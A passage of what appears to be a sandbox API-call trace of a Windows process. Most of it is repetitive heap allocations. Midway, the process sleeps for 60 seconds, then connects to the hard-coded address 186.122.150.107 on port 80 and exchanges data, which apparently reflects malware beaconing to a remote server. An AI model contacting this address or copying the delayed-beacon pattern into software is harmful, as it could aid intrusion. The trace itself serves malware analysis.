Size=0x140) returned 0x218a8d8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218b6f0 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218acb0 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218c130 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218b088 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x218c650 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b4210 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b4960 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b5320 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b45b8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b3fa0 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b4348 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b4bd0 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b34a8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b40d8 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b35e0 [0144.524] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x20b4828 [0144.530] Sleep (dwMilliseconds=0xea60) [0154.537] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0154.537] socket (af=2, type=1, protocol=6) returned 0x210 [0154.539] htons (hostshort=0x50) returned 0x5000 [0154.539] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0154.539] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0154.541] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0154.541] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0154.541] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0154.541] connect (s=0x210, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0154.804] send (s=0x210, buf=0x19d8f8*, len=203, flags=0) returned 203 [0154.804] recv (in: s=0x210, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0155.067] closesocket (s=0x210) returned 0 [0155.067] WSACleanup () returned 0 [0155.068] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e74d8 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e6c38 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e5af8 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e3aa0 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e3878 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e3cc8 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e4e08 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e5480 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e7700 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e5d20 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e5f48 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e4340 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e3ef0 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x21e4118 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e58d0 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e4568 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e6170 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e56a8 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e6398 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e5030 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e65c0 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e7928 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e5258 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e67e8 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e4790 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e6a10 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e6e60 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e7088 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e49b8 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x21e72b0 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a0d60 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a0f68 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a31f0 [0155.069] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a1fa8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a21b0 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a1170 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a1378 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a1580 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a23b8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a33f8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a25c0 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21a27c8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21ee0f8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21ef340 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21ed0b8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x21ed4c8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c7b98 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c75b0 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c71c0 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c77a8 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c79a0 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c7d90 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c7f88 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c8570 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21c8768 [0155.070] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21efe38 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21f21a8 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21f11e8 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21f2598 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21f0030 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21f2f70 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x21f1bc0 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21c91c8 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21ca8a8 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21cac78 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21caa90 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21c9f20 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21c9780 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21c9d38 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21c9598 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21ca108 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f3668 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f6058 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f7180 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f6610 [0155.071] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f6f98 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f3850 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x21f3a38 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f8700 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f88d8 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f8ab0 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f8c88 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f93e8 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f8e60 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f8350 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f9038 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f7840 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f8528 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f7fa0 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f9210 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f7668 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f7a18 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f7bf0 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x21f7dc8 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fa2e8 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fabd0 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fad98 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21faf60 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fb128 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21faa08 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fb2f0 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21f9a00 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21f9f58 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fa120 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21f9bc8 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fa678 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21f9670 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21f9838 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21f9d90 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x21fa4b0 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21cba68 [0155.072] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21cc9e0 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21ccb98 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21cb6f8 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21ccf08 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21cb388 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21cb1d0 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21cb540 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fcb18 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fc438 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fbd58 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fc7a8 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fce88 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fbf10 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fccd0 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x21fc960 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21ce268 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21ceab0 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cdbc8 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cd6d0 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cec58 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21ce410 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cee00 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21ce5b8 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cd528 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cefa8 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cd1d8 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cda20 [0155.073] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cdf18 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21cdd70 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21ce0c0 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x21ff2a8 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21b0960 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21b1158 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2200b40 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2200810 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2200678 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21ffb50 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21ffce8 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22011a0 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21ff688 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2201008 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22001b0 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2200348 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x21ffe80 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22009a8 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2200cd8 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22004e0 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x21b3d00 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x21b22f8 [0155.074] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x21b2f38 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2201818 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2203220 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22028f0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2202768 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2202c00 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2203098 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22033a8 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2202d88 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22022d0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2201690 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22019a0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2201b28 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2201cb0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cf4d0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21d0670 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cf938 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cf648 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cfab0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cf7c0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cfda0 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21cff18 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x21d0090 [0155.075] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2205280 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2204b28 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2204548 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2204ca0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2205108 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22053f8 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2203810 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d2430 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1d28 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d2b38 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d2e08 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d2f70 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d11e8 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1350 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d14b8 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1788 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d18f0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1e90 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1ff8 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1a58 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d1bc0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d2160 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x21d22c8 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d34a0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d3a00 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d4770 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d4368 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d4f80 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d3b58 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d4cd0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d31f0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d3cb0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d3e08 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d44c0 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d3750 [0155.076] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d4210 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d3348 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d40b8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x21d4e28 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x21b9db8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x21b9f00 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x21b8418 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x21b8188 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x21b82d0 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2205a78 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2207040 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2205bc0 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22064b8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2207188 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22069d8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22072d0 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2205930 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2206ef8 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x2206748 [0155.077] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, 